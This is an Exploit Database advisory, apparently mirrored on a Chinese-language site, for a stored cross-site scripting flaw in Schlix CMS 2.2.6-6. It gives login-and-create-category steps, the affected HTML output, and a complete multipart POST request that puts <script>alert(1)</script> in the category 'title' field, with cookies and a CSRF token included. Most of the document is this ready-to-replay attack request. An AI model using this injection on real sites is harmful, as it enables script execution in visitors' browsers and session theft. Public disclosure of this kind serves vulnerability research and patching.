Schlix CMS 2.2.6-6 – ‘title’ Persistent Cross-Site Scripting (Authenticated)

• Exploit Database
• 42 阅读

• 作者： Emircan Baş
  日期： 2021-05-06
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49837/

• # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
  # Date: 2021-05-05
  # Exploit Author: Emircan Baş
  # Vendor Homepage: https://www.schlix.com/
  # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
  # Version: 2.2.6-6
  # Tested on: Windows & WampServer
  
  ==> Tutorial <==
  
  1- Login with your account.
  2- Go to the contacts section. Directory is '/admin/app/contact'.
  3- Create a new category and type an XSS payload into the category title.
  4- XSS payload will be executed when we travel to created page.
  
  ==> Vulnerable Source Code <==
  
  <article class="main category">	 
  <div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">
  <div class="media-header-title container d-flex h-100">
  <div class="row align-self-center w-100">
  <div class="col-8 mx-auto">
  <div class="text-center">
  <h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE
  </div>
  </div>
  </div>
  </div>
  </div>
  <div class="breadcrumb-bg">
  <div class="container">
   <div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="https://www.exploit-db.com/cms">
   <i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="https://www.exploit-db.com/cms/contacts/">Contacts</a></li><li class="breadcrumb-item">
   <a href="https://www.exploit-db.com/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE
  </div>
  
  ==> HTTP Request <==
  
  POST /admin/app/contacts?action=savecategory HTTP/1.1
  Host: (HOST)
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489
  Content-Length: 4146
  Origin: (ORIGIN)
  Connection: close
  Referer: (REFERER)
  Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
  Upgrade-Insecure-Requests: 1
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="_csrftoken"
  
  49feefcd2b917b9855cd55c8bd174235fa5912e4
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="cid"
  
  6
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="parent_id"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="guid"
  
  ee34f23a-7167-a454-8576-20bef7575c15
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="title"
  
  <script>alert(1)</script>
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="status"
  
  1
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="virtual_filename"
  
  script-alert-1-script
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="summary"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="description"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="meta_description"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="meta_key"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="tags"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="date_available"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="date_expiry"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="items_per_page"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[]"
  
  display_pagetitle
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[]"
  
  __null__
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[]"
  
  display_child_categories
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[]"
  
  __null__
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[]"
  
  display_items
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[]"
  
  __null__
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[child_categories_sortby]"
  
  date_created
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="options[items_sortby]"
  
  date_created
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="permission_read_everyone"
  
  everyone
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="permission_read[]"
  
  1
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="permission_read[]"
  
  2
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="permission_read[]"
  
  3
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="permission_write[]"
  
  1
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="cmh_media_selection"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="cmh_media_upload"; filename=""
  Content-Type: application/octet-stream
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="cmh_media_path"
  
  
  -----------------------------280033592236615772622294478489
  Content-Disposition: form-data; name="cmh_media_url"
  
  
  -----------------------------280033592236615772622294478489--